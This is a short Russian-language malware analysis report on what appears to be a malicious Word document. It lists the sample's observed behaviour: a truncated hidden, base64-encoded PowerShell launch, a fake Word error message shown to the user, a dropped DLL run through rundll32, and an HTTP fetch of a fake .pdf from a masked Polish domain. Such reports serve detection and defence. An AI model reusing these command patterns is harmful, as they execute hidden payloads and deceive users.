Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAAxADIAcABpAEYAUwAgAD0AWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9AHsAMwB9ACIALQBGACAAJwBTACcALAAnAHkAUwAnACwAJwB0AGUAbQAuAGkAbwAuAGQASQByAGUAJwAsACcAQwB0AG8A...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1190474.cvr
- %HOMEPATH%\mcmk_7n\lwsm3ix\z3czln3sh.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://de##.#bstrony.pl/z21cq4pn.pdf
UDP
- DNS ASK de##.#bstrony.pl
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAAxADIAcABpAEYAUwAgAD0AWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMQB9AH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Mcmk_7n\Lwsm3ix\Z3czln3sh.dll 0
